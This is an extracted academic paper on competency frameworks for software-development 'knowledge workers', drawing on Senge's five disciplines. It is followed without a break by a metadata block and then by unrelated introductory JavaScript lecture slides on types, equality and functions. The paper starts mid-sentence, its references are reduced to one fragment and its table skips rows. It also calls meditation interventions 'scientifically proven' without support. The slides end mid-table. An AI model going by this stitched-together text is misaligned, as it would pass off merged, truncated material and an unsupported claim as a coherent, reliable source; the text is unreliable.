ground for a learning enabled organization of the future that is struggling under enormous pressure of competition in today’s landscape. KEY WORDS Competencies, Knowledge Workers, Software Development Team Professionals, Systems View. 1.0 INTRODUCTION The employee as a knowledge worker is increasingly recognized in the IT industry. It has been an emerging area of research in the Information Systems literature (Davis, 1999). Before proceeding any further we need to address what is an “IT worker” as a key artifact of the knowledge work era. An IT worker is an organizational employee responsible for designing, building, testing, maintaining, and operating organizational applications and infrastructure. Such IT workers are characterized by high turnover rates as they are being wooed away by the private sector in droves resulting in fierce marketplace competitiveness for staff. In general, our global, knowledge-based, postindustrial economy is made up of knowledge organizations that have migrated form a job-description based, task-oriented workforce to one in which knowledge workers occupy broader roles that may change over time as projects change, evolve, and develop. The rapidity of technology change demands different skills from the employees than ever before in the past. In such a context, determination of relevant competencies becomes inimical to the success of tomorrow’s knowledge workers in knowledge-intensive organizations. Besides, its crucial to understand the engineering of the individual consciousness shifts to make such a competency initiative work for these knowledge workers. Much of the support for the knowledge work productivity consists of enabling technology, enabling methods and procedures, and organization culture that transmits “how things are done”. Interestingly, there is little or no research to distinguish the competence led strategies of the more productive workers. Although the competency theories are scarce, there is ample evidence in the literature of attempts to explain the term “competency.” As per the review of the competencies’ literature, there have been two approaches to identify the meaning of the term “competency.” Boyatzis headed a research in the 1970s, initiated by the American Management Association to find out what makes the managers competent. This approach led him to believe that the “competencies” is a general term for the skills that are and can be deployed by the managers to accomplish their assigned jobs. These few skills are best learned by practice that takes place on the job. Boyatzis (1982) had built on this research in his classic model, which is an adaptation of the classical psychological model of behavior. According to him, behavior is determined by the person and the environment. Both the gurus of the human core competency define it as an “underlying characteristic causally related to superior performance in resonance with its environment”. The other approach was based on a study by the UK Government Employment Department asserting that the term “competency” has a wider implication than just the attributes of jobholders. Instead, the approach identifies the outcomes expected from a job when it is performed adequately. It suggests not only skills and knowledge but also the range of qualities of personal effectiveness to get the job done. In keeping with the second view, McClelland (1985) first broached the topic of superior performance by individuals at a specific job. This he attributed to the term “competencies” by which people in any organization can be evaluated and assessed to predict their performance. Further literature review presents a wide array of studies on the subject of the individual competencies to perform a given job effectively. Additionally, Spencer et al. (1993) further define competency as an underlying characteristic of an individual, causally related to criterion-referenced effective and/or superior performance in a job. Further to that, William Rothwell, (1989) the leading practitioner of competency and competency mapping techniques describes it as the internal capabilities that people bring to their jobs. The above authors define competencies only as a subset of the employee competence at work. Moreover, their definition is lacking in the visible behavior aspect of an employee that we wish to study and define. We will try to explain competency more on a dynamic behavioral pattern of a set of activities that an individual performs to stay effective in a given context of his job in an organization. At this stage it might be interesting to mention that the competencies have also been characterized by a set of behavior patterns, but have yet to combine the strategic orientation to them. For e.g. the behavioral perspective has led writers and firms to compile profiles of generic competencies and to relate these to performance (Spencer and Spencer, 1993). The compilation of a set of personal characteristics or competencies has been criticized in the earlier said literature and we set about to move beyond the concept of competencies to the firm’s core competitiveness which are the “roots of competitiveness” (Prahlad and Hamel, 1990). This facilitates the combination of the strategic and behavioral competencies which Sparrow (1994) contends is the most appropriate competency approach. Grant (1991) observes that the rationale for basing the firm’s long-term strategy on its resources and capabilities rests on the premise that the resources and capabilities provide the basic direction for the firm’s strategy, and that they are the primary source of profit for the firm. Hence, we can argue that to the extent the human resources are at the heart of organizational process, they are a potential root of competitiveness. Also, significant is the contribution of Nordhaug and Gronhaug (1994) who also see human competency as a critical resource for competitiveness especially where competencies are treated as a portfolio configured with regard to a firm’s value activities. Thus, the significance of analytical and cognitive abilities, interpersonal and social skills derives from their association with the core services/activities. In practice, this means that managers should be able to relate behavioral profiling not merely to the job but to the core business activity. The advantage afforded by the more successful employee’s competencies can be replicated throughout a business. Thus, one manager will be more successful in a certain role compared to his/her peers because his/her set of competencies are more suited to the functions required of him/her in that position. The human competency is thus an aspect of business by which we define what we can do best. It’s a core capability that is dynamic to the extent that it won’t be imitated by any employee as it’s a function of dynamic learning processes or continual practice that feeds it at all times. 3.0 THE STRATEGIC HUMAN COMPETENCE FRAMEWORK Human resource management theorists applying resource-based lenses have highlighted the advantage-producing traits of human capital (Castanias and Helfat, 1991) e.g. top management expertise has been described as a rent-generating firm resource. In contrast to generic skills which are easily transferable between uses, industry-related and firm-specific managerial skills may generate quasi-rents. Both, however, may produce Ricardoian rents because they are scarce and difficult to duplicate perfectly. No matter how much one understands about the mental processes, structures, and representations that underlie cognitive performance, intelligence cannot be fully grasped unless one understands how it is applied in the everyday world (Warr and Conner, 1992). A theory of intelligence must ultimately reflect the capability of emitting contextually appropriate behavior, which includes the utilization of tacit knowledge (Sternberg, 1985). Therefore, the rent-generating features of intelligence cannot be assessed in terms of psychometric scores that measure problem solving and verbal abilities alone; they must also be assessed in terms of practical competencies. These also reflect tacit or intangible knowledge which are not easily duplicated or substituted (Hall, 1993; Reed and DeFillipi, 1990). Also, practitioners of intelligence have highlighted the fact that traits like intelligence are fundamentally irrelevant for determining the individual differences in acquired expertise (e.g., Ericsson et al., 1993). To explain sustained competitive advantage and supernormal profits, the resource-based view (RBV) focuses on the characteristics of three types of resources viz. physical capital, human capital and organizational capital. These three types of capital form the mainstay of strategy and RBV related theory. We focus on the last two resources for studying the human competence at work. This implies the static human resource of skills, knowledge changes in compliance with the organizational routines. The resultant is closely aligned to firm’s business activities. Thus, we may point out that rent-generating feature of resources is manifested in the K-worker’s strategic competency. 3.1 Competency of a K-Worker Defined Hence, we define the human competency as follows: A firm specific, rent-generating, critical resource manifested in the behavior pattern of its employees that is aligned with a firm’s core business activities. Having arrived at a workable definition of a K-worker, we strive to present a research lead gap in K-worker study in the information systems (IS) discipline. IS discipline can be as a starting point for the studies on the K-workers have focused specifically on the skills as a static component of human & technical ability also in addition to organizational and technical skills alone. The exception is the Trauth et al. (1993) article that focuses on an additional requisite by a k-worker in the given context. 4.0 LITERATURE REVIEW OF K-WORKER’S IN THE INFORMATION SYSTEMS In the past, several studies have been the cynosure of the knowledge and skill requirements of the IS personnel (Baroudi, 1985; Bryant, 1975; Cheney, 1988; Cox and Snyder, 1985). These researches drive home the point that there needs to be still more refining done in the IS professionals generic requirements in a work environment which change with passing time (Baroudi, 1985; Cheney, 1988). The studies conducted in the 1980s indicated a growing need for IS personnel to have functional expertise (Cheney, 1988) so that they may be able to freely consult the end-users too. Recent spate of research on the skills of IS professionals tends to focus on soft skills irrespective of totality of skill vs. competence set required by them (Lee, Trauth, Farwell, 1995; Nelson, 1991; Todd, McKean & Gallupe, 1995; Trauth, Farwell & Lee, 1993; Wade & Parent, 2002). It can be inferred (Table 1) that the area of human competencies has gone unresearched so far owing to the focus on IS professional’s knowledge and skills alone. Moreover, specific studies have been done on the skills of web-designers and web masters (ex. Sgobbi, 2002; Wade & Parent, 2002), but so far no research has been done on the core competencies of a systems professional in the context of ubiquitous phenomenon software development teams. Also, most of the works discussed so far have captured (refer Table 1) IS professionals’ knowledge and skills in the form of organizational and technical skills alone. The exception is the Trauth et al. (1993) article that focuses on an additional component of human & technical ability also in addition to the skills profiling. It can noted that these workers on the IS or K-workers have focused specifically on the skills as a static resource independent of organization in which they would be deployed. This then forms the crux of our competence framework wherein we would attempt to highlight the application based K-worker competencies. 4.1 Core activities in Software Industry/teams This is the first initiative to make a workable measure of the key competency areas of software development professionals operating in a team environment. Thus in a novel approach to this knowledge based search for individual competencies, we provide the key strategic business activity dimensions as identified in the literature. This then forms the basis for the present study. The literature review of the software organizations reveals that there are few core business imperatives around which these organizations flourish. Based on our analysis from the literature so far, we are hereby proposing a framework to understand what it takes to convert a skill set as a resource into a dynamic human competence capability aligned with the business imperatives in the software development industry. Thus, we establish the key competence areas of these firms that enable its human resources to align their competences around these core business activities. The following is thus the definition of the five highlighted business lead core human competency areas. **4.1.1 Futuristic Orientation Competency** This implies the business processes of the software development team that require its K-workers to learn new technologies, languages et al. For this the software firms initiate collaborations with Microsoft, ORACLE, Novell et al corporations to train their K-workers/ engineers on future technologies. Besides, with outsourcing projects on the upswing the K-workers are trained to be multi-lingual with multicultural awareness for probable future projects. Thus, we see that these firms have built-in system features that preempt the programmers or K-workers in their field to develop these futuristic orientation competencies. **4.1.2 Problem Resolution Competency** The software developer’s world is forever fraught with complex situations. These then could be related resolving the system analysis and design, deciphering the right code, finding the right fit between complexities of output vs. its multiplicative features. This entails debugging, troubleshooting et al resolutions. Sometimes the issues in customer solution crop up post implementation, wherein the know-how of code formulators is needed. Who might have been assigned a different duty. This implies a problem situation of getting across to them and resolving the pending customer issues. Further, the customers might. ### Table 1: Recent Research on IS developer’s profile <table> <thead> <tr> <th>Recent Studies on IS/K-Worker</th> <th>Construct Studied</th> <th>Sub dimensions of the Construct</th> <th>Methods</th> <th>Sample Unit</th> <th>Key Findings</th> </tr> </thead> <tbody> <tr> <td>Wade and Parent, 2002</td> <td>Skills</td> <td>Technical (Development)</td> <td>Job-content analysis and survey</td> <td>Web masters</td> <td>Empirical link between job skills and job performance</td> </tr> <tr> <td>Lee, Trauth and Farwell, 1995</td> <td>Knowledge and skills</td> <td>Business &amp; interpersonal</td> <td>Focus Groups and Delphi Surveys</td> <td>IS and User managers</td> <td>Requirement of IS professional with both technical as well as organizational skills</td> </tr> <tr> <td>Todd, McKeen and Gallupe, 1995</td> <td>Skills</td> <td>Technical (Development)</td> <td>Job-content analysis</td> <td>System analysts and IS managers</td> <td>Systems analysts job requirements show maximum transition with increasing requirement of technical knowledge</td> </tr> <tr> <td>Trauth, Farwell and Lee, 1993</td> <td>Skills</td> <td>Business (Business abilities)</td> <td>Brain storming sessions, telephonic interviews and focus groups</td> <td>IS managers, end-user managers, and IS professors</td> <td>An expectation gap discovered between industry needs and academic preparation of the future IS professional</td> </tr> <tr> <td>Nelson, 1991</td> <td>Knowledge and skills</td> <td>General IS (Knowledge, IS product and technical)</td> <td>Focus groups and survey</td> <td>IS and end-user personnel</td> <td>IS personnel need more organizational knowledge End-users require more IS-related skills</td> </tr> </tbody> </table> present critical issues from time-to-time, requiring attention. This implies knowing the organizational structure, its hierarchy, and facilitating persons for a particular issue in the network. Thus, all these facets of a fast paced knowledge organization enable the problem resolution competency development of a K-worker. 4.1.3 Quality Approach Competency The software industry is crowned with a host of quality related accreditations and awards that need to be adhered to. This instills in the K-workers the ethics of quality work. Moreover, this implies the precision in code writing, the minimization of bugs in code et al. The real-time incorporation of dynamic code requirements from the customer’s vantage point is another example of quality work ethic. Thus, we may see from these examples how the quality competency becomes incorporated in the profile of a K-worker. 4.1.4 Group Orientation Competency The work in this knowledge era is more demanding group-wise i.e. there is more dependence on work groups and teams to get the jobs accomplished. The software development team is an example of such a work culture. Thus, we see a lot of attention paid to peer-to-peer networking, conflict resolution mechanisms, delegations, negotiations et al group mechanisms. This makes the K-workers resolute to work cooperatively in large and small teams, thus instilling in them what is termed as the group orientation competency. 4.1.5 Customer Orientation Competency The last but not the least, as is well known is the care of the customers. The knowledge work in the fast paced software industry is increasingly client focused. This requires working even on the weekends or public holidays if that is what the client requires. For a K-worker this means showing initiative, enthusiasm and motivation for serving the customer. The K-worker needs to have domain knowledge and corporate know-how of the client to be on the top of any critical situation. Thus, K-workers are called for value-adding to their custom-tailored solution for each customer. This instills in them a key competency of customer orientation. Hence, above are the key competency areas for a software programmer and a typical example of twenty-first century K-worker. These key activities are the summarized as the core competence areas of these organizations (refer Table 2). We can thereby utilize this knowledge to develop frames for understanding individual competency levels on each of the above dimensions. Then we may enhance the K-worker competency and bridge the competency gaps based on the following insights from the Peter Senge’s Fifth Discipline (1990). The following is a prescriptive section for the human resource practitioners in the K-era. 5.0 MANAGING K-WORKER’S COMPETENCY: A SYSTEMATIC APPLICATION OF THE FIFTH DISCIPLINE The characteristics of organizational systems, which include complexity, internal dynamics, and intransperence, ensure incomplete or incorrect understanding of the system. As people perform, they create performance systems which can be seen as the outputs of their competency measures. These then present constraints to and opportunities for future choices. It can be noted that people as dynamic entities create continuously evolving performance and competency gaps. Besides, the intransparence of organizational systems caused by system complexity and internal dynamics result in in clarity about performance improvement situations. This implies incorrect understanding of the system in which an individual may plan, decide, and take action to fulfill his and his team’s aspirations. Today, the learning organizations are those where people continually expand their capacity to create the results they truly desire, where new and expansive patterns of thinking are nurtured, where collective aspiration is set free, and where people are continually learning how to learn together. (Senge, 1990). The distinguishing feature of a learning, knowledge-oriented organization is the art of converging the five disciplines of systems thinking, personal mastery, mental models, building shared vision and the team learning. Thereby, we propose to view competencies of the workforce via this lens of the Senge’s five disciplines. The ensemble of five disciplines is mutually dependent. 5.1 Personal mastery The first discipline of personal mastery is the most alarming signal for an organization without which any understanding of an employee is not possible. Personal mastery’s spiritual foundations are clear as the discipline of continually clarifying and deepening our personal vision, values and objectivity. To tap the reservoir of employee creativity, personal mastery starts with clarifying the things that really matter to employees in the workplace. In order to serve their highest aspirations, the members of the software development teams (SDT) need to be aware of the relevant benchmarks i.e. what works best? This is where a competency profile generation of the software professional would shed light on the trends in the much sought after profession today. This would guide the professional development of each and every employee in a SDT. This forms the basis for much research work into software professional’s skill field (Lee, Trauth & Farewell, 1995), as this moves beyond acknowledgement of valuable human resources to setting standards for effectively harnessing it. This would then form the basis for any employee development program enlisting a more genuine and comprehensive of system’s development professionals. Table 2: The Five Key Business Activities of the Software Organization <table> <thead> <tr> <th>Sr.No.</th> <th>Topics covered</th> <th>Cited Literature</th> <th>Key Business Activity</th> </tr> </thead> <tbody> <tr> <td>1.</td> <td>Quality Processes viz. documentation, SEI-CMM level 5, PCMM level 5 optimization et al.</td> <td>Boehm and Egyed (1999); Meredith (1985); Robinson and Ringer (1999); Tomek and Giles (1999)</td> <td>Quality Approach</td> </tr> <tr> <td>2.</td> <td>Conflict Management and buffers to social interactions</td> <td>Gobeli, Koenig &amp; Bechinger (1998); Sawyer (2001); Sawyer, Farber and Spillers (1997); Sussman and Guinan (1999); Zachary (1998)</td> <td>Group Orientation</td> </tr> <tr> <td>6.</td> <td>Packaged software vs. in-house development teams</td> <td>Carmel and Sawyer (1998)</td> <td>Group Orientation</td> </tr> <tr> <td>8.</td> <td>Project management skills and related variables</td> <td>Ball (1985); Boehm and Ross (1989); Carragher (1985); Sweet (1985); Taft, Borchering and Hudgins (1991)</td> <td>Future Orientation, Quality, Customer Orientation, Problem Resolution and Group Orientation</td> </tr> <tr> <td>10.</td> <td>Effective time and project deadline management</td> <td>Blackburn and Scudder (1996); Meilir (1985)</td> <td>Quality Approach and Problem Resolution</td> </tr> </tbody> </table> 5.2 Mental Models We proceed further to the second discipline, which is that of mental models that are instrumental in effecting human behavior. It is concerned with an individual’s insight into his “self” which may be only enabled through openness to inquiry and learning. Again, in the perspective of the software industry, it’s not far from truth as people learn to manage themselves all the time. But, still certain organizational interventions like assessment centers and training & development can be crafted to enable an individual’s growth and learning. The effort should be meant to lead to intrinsic upliftment fulfilling self-awareness and self-actualization needs. An example could be the training interventions directed towards raising individual as well as collective consciousness like transcendental meditation techniques. Moreover, the proponents of transcendental approach consider quality and high competence as synonymous with “innate excellence”. Scientifically then, such interventions have been proven in some key organizations and industries across Europe and the United States. The global K-workers can benefit too from this intervention once rightfully conceptualized and administered. Thus, to make many organizational changes and practices meaningful for each employee it becomes necessary to involve their tacit mental models as a useful tool. 5.3. Shared Vision The third discipline concerns itself chiefly with the building of this shared vision. All successful organizations deeply share their goals, values and missions with their employees. What then would be required would be a shared vision of the commonalities in the software developer’s community by virtue of their competency goals. This would help in binding them together through a common identity and destiny despite their indisputably different selves and orientations. This practice of sharing competency measures would involve the skill of mentally shared “pictures of the future”. This in turn fosters genuine commitment and enrollment rather than the dictates of compliance. 5.4. Team Learning The fourth discipline is of team learning, that in turn abets organizational learning. This is not possible in the absence of shared vision and goals. All organizational members learn to respect and internalize the common competency goals of the group. Noteworthy is the fact that the resulting capacity and the intelligence of the team would be far greater than its individuals’ total. 5.5. Systems Thinking The systems thinking, the last of the above five disciplines, considers business and other human endeavors as systems (Senge, 1990). We as human beings are apt to focus on the snapshots of isolated parts of the system alone. In the process, we may fail to take cognizance of entirety and reality of a situation, which results in a parochial view of any crisis situation. Hence, the solution lies in the systems thinking, whereby we mean a conceptual framework that makes the patterns and events clearer. This enables us to manipulate the reality that brings about requisite change. Taking the instance of the K-work in the software development teams, it is often recorded that the personnel are subjected to the ubiquitous job related training programs that are generic in nature. The need is to treat each employee as an entity embedded in the environmental system of the organization and with a specific mental model. The need is then to produce “metanoia” or the shift of the mind of its employees to result in enhanced competency via above mentioned techniques. This is pertinent since the systems’ thinking is needed that believes in every employee as a distinct stakeholder in the organization. This would certainly imply that each K-worker differ in its training and developmental needs. This view is supported by the Resource Based View (Barney, 1991) which values each employee as a potential resource base that needs individual nurturing rather then being considered as another faceless cog in the wheel. All the above-mentioned disciplines enmesh to provide significant competency-lead team learning resulting in smoother coordination and cooperation within these sub-groups (refer Figure 1). Thus, we make a significant contribution to the much needed research on the quality of the K-workers in a K-organization like a software development team. 6.0 IMPLICATIONS The critical perspective of social constructivist approach considers quality as being constructed through the accounts provided by various powerful agents i.e. a product/professional is held to be a quality product/professional not because it is inherently good, but because it has been adjudged good by those in a position to bestow or recognize quality in the product/professional viz. the customers, the top management, a standards certification body etc. (Kelemen, 2003). This approach justifies the rationale for focusing on the much-acclaimed competence of the professionals in the competent and successful organizations in the software development industry. The management of the human resource via these core competencies impacts on the competitive advantage in the firms, through its role in determining the skills and motivations of the employees and the cost of hiring and training them. With the software development industry getting crowned with the host of quality certifications and awards at organizational and customer satisfaction level, it is necessitated to view it from the third eye-the eye of their professional’s quality. Noteworthy is the finding that almost two third’s of organizational value is perceived to be intellectual and that half of this intellectual capital (IC) value is perceived to be from the people dimension. But, still the theories in this sense of IC management are scarce. Thus, filling these gaps in knowledge requires the development of mid-range theories; theories where general frameworks are available but lack domain specific operationalizations. Moreover, it has been noted that the alignment of human resource practices with the philosophy of quality requires significant changes in the way organization trains, empowers, evaluates and rewards individuals and teams. Most quality programs rely on the use of Human Resource Policies to encourage employees to embrace both standardized and continuous improvement tasks so as to generate employee commitment. Interestingly enough, the need for employee commitment and involvement to the goal of quality has not been explicit in the work of the quality gurus. For instance, Deming’s quality philosophy focused only on the changes management has to make and Juran’s quality ethics mentioned employee involvement only superficially. A study of quality award winners in America (e.g. Xerox, Motorola) suggest that the integration of Human Resource Management and quality management practices in these companies has apparently lead to reduced costs, increased product reliability, greater customer satisfaction and shorter product life-cycles. The requirements of the software process maturity models termed as Capability Maturity Model (CMM) are unique in the sense that they show that information systems professionals working in large teams must be capable of being highly productive with strong emphasis on process control and overall quality. The quality practices of continuous improvement when applied to HR would rely on the generation of objective data like facts that are perceived true and can be used to promote and systematically improve the work processes of people. In the software industry, people management practices although significantly studied, do not address people issues in a systematic and structured manner. Hence, this study brings attention to human resources with a focus on the competencies of the K-worker’s in the software industry. 7.0 FUTURE RESEARCH DIRECTIONS This study can be designed to be a precursor to a more empirically driven formulation of core competencies of a K-worker in a software development environment or in another K-worker arena. Further, we may develop a cross-cultural understanding of the variations in the profiling of a K-worker’s competencies. Besides, the K-worker management needs to reach new, improved heights by the systems view application as outlined in this study. An empirical validation of this in the real-world via a case study approach would further strengthen our framework. Thus, the strategic human resource management would tremendously benefit from this study in this era of businesses outgrowing national boundaries 8.0 REFERENCES process integration. Computer Standards and Interfaces. 21(1): 63-75.
{"Source-Url": "https://core.ac.uk/download/pdf/42981034.pdf", "len_cl100k_base": 6675, "olmocr-version": "0.1.53", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 33018, "total-output-tokens": 10848, "length": "2e12", "weborganizer": {"__label__adult": 0.001007080078125, "__label__art_design": 0.0013828277587890625, "__label__crime_law": 0.0009012222290039062, "__label__education_jobs": 0.1263427734375, "__label__entertainment": 0.00027632713317871094, "__label__fashion_beauty": 0.000499725341796875, "__label__finance_business": 0.040435791015625, "__label__food_dining": 0.001308441162109375, "__label__games": 0.0012598037719726562, "__label__hardware": 0.0009222030639648438, "__label__health": 0.0017604827880859375, "__label__history": 0.0006017684936523438, "__label__home_hobbies": 0.0004048347473144531, "__label__industrial": 0.001384735107421875, "__label__literature": 0.0014505386352539062, "__label__politics": 0.0009908676147460938, "__label__religion": 0.000888824462890625, "__label__science_tech": 0.0244903564453125, "__label__social_life": 0.0008106231689453125, "__label__software": 0.01351165771484375, "__label__software_dev": 0.77685546875, "__label__sports_fitness": 0.0008025169372558594, "__label__transportation": 0.0011682510375976562, "__label__travel": 0.0006532669067382812}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 46398, 0.05782]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 46398, 0.20431]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 46398, 0.90942]], "google_gemma-3-12b-it_contains_pii": [[0, 3960, false], [3960, 9628, null], [9628, 14963, null], [14963, 17997, null], [17997, 23554, null], [23554, 28660, null], [28660, 31654, null], [31654, 37260, null], [37260, 42164, null], [42164, 46398, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3960, true], [3960, 9628, null], [9628, 14963, null], [14963, 17997, null], [17997, 23554, null], [23554, 28660, null], [28660, 31654, null], [31654, 37260, null], [37260, 42164, null], [42164, 46398, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 46398, null]], "pdf_page_numbers": [[0, 3960, 1], [3960, 9628, 2], [9628, 14963, 3], [14963, 17997, 4], [17997, 23554, 5], [23554, 28660, 6], [28660, 31654, 7], [31654, 37260, 8], [37260, 42164, 9], [42164, 46398, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 46398, 0.11494]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
c45f388400b817ba76652fa5438d361473301c13
To Ponder Evaluate: True or false? \[ \begin{align*} true & \equiv '1' \\ 'false' & \equiv false \\ 0 & \equiv '0' \\ 0 & \equiv '' \\ NaN & \equiv NaN \end{align*} \] JavaScript: Introduction, Types, Functions Lecture 15 History - Developed by Netscape - “LiveScript”, then renamed JavaScript - *Nothing* to do with Java! - Motivation: client-side execution in browser - Interpretted - Standardized by ECMA (“ECMAScript”) - Big update v6 in 2015, ie ES6 (aka ES15) - Now annual updates, every June - After ES6, named with year (eg ES20) - Has become popular outside of browsers - *e.g.* Node.js - Translation target for other languages: - Syntax: CoffeeScript - Static types: Dart (Google), TypeScript (MS) Client-Side Execution GET /news/index.php HTTP/1.1 Host: www.osu.edu User-Agent: Mozilla/5.0 (X11; Ubuntu;...etc <!DOCTYPE html> <html lang="en"> <head><title>My Page</title> <meta charset="utf-8" /> ... </html> <!DOCTYPE html> <html lang="en"> <head> <title>Something Short and Sweet</title> <meta charset="utf-8" /> </head> <body> <p>Hello <a href="planet.html">World</a>!</p> <br /> <img src="globe.png" alt="a globe"/> </body> </html> <!DOCTYPE html> <html lang="en"> <head> <title>Something Short and Sweet</title> <meta charset="utf-8" /> <script> window.alert("Annoying!"); </script> </head> <body> <p> Hello <a href="planet.html">World</a>! </p> <img src="globe.png" alt="a globe"/> </body> </html> Including Scripts - Head: executed before body displays - Script (source) can be explicitly included ```html <script> console.info("hi"); ... </script> ``` - Script can be linked in from external file ```html <script src="MyProgram.js"></script> ``` - Recall: linking to CSS - Inline: executed as body is displayed - Browser blocks while downloading - Common advice: put scripts at end of body - Modern advice: use `<script src="..." async>` Async/defer Downloading defer async parser fetch execution Demo - Simple “hello world” (page1.html) - HTML file containing JavaScript - Body is empty, script writes HTML output - Browser displays result - Examining result with dev tools - Sources: see JavaScript program - Place breakpoints and reload - Console: see console output Some Objects Provided Implicitly - Some objects are created implicitly by the execution environment (browser) - Document object (document) - document.writeln() puts output in body - Window object (window) - Refers to browser's display window - Alert method pops up a dialogue ```javascript window.alert("Say \"cheese\"!"); ``` - Prompt method pops up a dialogue ```javascript name = window.prompt("Enter name"); ``` Demo with Popups - See: codepen.io/cse3901/pen/BYqqPb - Alert window - Prompt window - Console output (info, warn, error) - Notice: - HTML body is empty - Settings > Auto-update preview (Off) Familiar (Java) Minor Syntax - Statement separator ; - Wrinkle: ;'s are optional! - Implicitly automatically inserted - But clearer and safer to include explicitly - Statement blocks {...} - Parentheses in expressions (…) - Comments // and /*…*/ Familiar (Java) Operators - Arithmetic (numbers are floats) - `+` - `*` - `/` - `%` - Wrinkles: - No diff in `/` between ints and floats! - `%` works on floats! - Relational - `<` - `>` - `<=` - `>=` - `==` - `!=` - Wrinkle: `===` - `!==` - Logical - `&` - `|` - `!` Familiar (Java) Statements - **Assignment** - `=` - `+= -= *= /= %=` - `++ --` (pre and post) - **Conditionals** - `if (...)`, `if (...) ... else` - `switch (c)` - `case 'a': ... case 'b': ... default;` - **Iteration** - `while (...)`, `do...while(...)` - `for (...;...;...)` - `break, continue` Primitive vs Reference Types - Distinction is similar to Java - A variable is a “slot” in memory - A variable can be *primitive* - The slot holds the value itself - Boolean, number, string, (null, undefined) - Since ECMAScript 2015 (ES6): symbols - A variable can be a *reference* - The slot holds a pointer to the value - Arrays and objects (including functions!) Primitive vs Reference Types - \(a\): 34.2 - \(b\): "hi" - \(c\): 4 - \(d\): width: 12, height: 15, color: "blue" Primitives: Checking Equality ```javascript let a = 5; let b = 5; let c = 7; if (a == b) ... //=> true, equal slots if (a == c) ... //=> false let x = "hello"; let y = "hello"; if (x == y) ... //=> true! cf. Java ``` Primitives: Assignment is Copy ```javascript let a = 5; let b = a; // copy contents of slot b++; if (a == 5)… //=> true, a unchanged ``` Assignment is Copy (of Slot) ```javascript let a = 5; let b = a; b++; if (a == 5)... ``` Primitives: Argument Passing ```javascript function inc (param) { param++; } let a = 5; inc(a); // copy contents of slot if (a == 5) ... //=> true ``` let a = {x:1, y:4}; // a new object let b = {x:1, y:4}; // a new object if (a == b) ... //=> false a = b; // copy contents of slot if (a == b) ... //=> true Assignment is Copy (of Slot) \[ a = b; \] \[ a \neq b \] \[ a == b \] References: Argument Passing ```javascript function inc (param) { param.x++; } let a = {x: 1, y: 4}; inc(a); // copy contents of slot if (a.x == 2)... //=> true ``` function inc (param) { param = {x: 2, y: 7}; } let a = {x: 1, y: 4}; inc(a); // copy contents of slot if (a.x == 2) //=> false Wrinkle: `==` vs `===` - Recall `+` operator in Java - Concatenation between strings - Addition between numbers - `3 + "4"` also works! Results in "34" - Similarly, JavaScript `== (!=)` tries to make types match - `3 == "3"` is true! - To prevent implicit type conversion, use `=== (!==)` - `3 === "3"` is false - More on type conversion later... Demo: Iteration - See: codepen.io/cse3901/pen/Jpmejp - Table generated by Javascript - Prompt for initial value - Calculate interest series - Print out a row of table for each year Static vs Dynamic Types - **Static:** known at compile time - *e.g.*, C, C++, Java, Ada - `int x` - `char[] a` - `FluffyCloud t` - `void* d` - **Dynamic:** known only at run time - *e.g.*, Python, PHP, Ruby, JavaScript - `let x` - `let a` - `let t` - `let d` Static Types - **a**: 34.2 (number) - **b**: "hi" (string) - **c**: num[] (two arrays: 4, 0, -300, 3.14) - **d**: Shape (width: 12, height: 15, color: "blue") Dynamic Types - \( a \): 34.2 - \( b \): "hi" - \( c \): - let - 4 - 0 - -300 - 3.14 - \( d \): - let - width: 12 - height: 15 - color: "blue" - Object \[ \text{let [ ]} \] Function Signatures - Statically typed ```java String parse(char[] s, int i) {... return e;} out = parse(t, x); ``` - Parameter types (i.e. s and i) are declared - Return type (i.e. of parse) is declared - The compiler checks conformance of - (Declared) types of arguments (t, x) - (Declared) type of return expression (e) - (Declared) type of expression using parse (out) - Dynamically typed ```javascript function parse(s, i) { ... } out = parse(t, x) ``` - You are on your own! Changing Types at Run-time Static Types // a is undefined String a; // a is null string a = "hi;" // compile-time err a = "hi"; a = 3; // compile-time err a.push(); Dynamic Types // a is undeclared let a; // a is undefined a = "hi;" // load-time error a = "hi"; a = 3; // a is a number a.push(); // run-time error Resources - MDN (Mozilla Developer Network) - developer.mozilla.org/docs/JavaScript - codepen.io, jsfiddle.net - HTML, CSS, Javascript → result - REPL - In VM, at console: - $ node - In a browser: repl.it/languages/javascript - Class web site (under Resources) - Style guides (Airbnb, Google) - Books, available online - JavaScript: The Definitive Guide (Flanagan) - Eloquent JavaScript (Haverbeke) ## Conversion of Primitive Values <table> <thead> <tr> <th>numbers</th> <th>string</th> <th>number</th> <th>boolean</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>&quot;0&quot;</td> <td>false</td> <td></td> </tr> <tr> <td>-0</td> <td>&quot;0&quot;</td> <td>false</td> <td></td> </tr> <tr> <td>1</td> <td>&quot;1&quot;</td> <td>true</td> <td></td> </tr> <tr> <td>NaN</td> <td>&quot;NaN&quot;</td> <td>false</td> <td></td> </tr> <tr> <td>Infinity</td> <td>&quot;Infinity&quot;</td> <td>true</td> <td></td> </tr> <tr> <td>-Infinity</td> <td>&quot;-Infinity&quot;</td> <td>true</td> <td></td> </tr> <tr> <td>6.022e23</td> 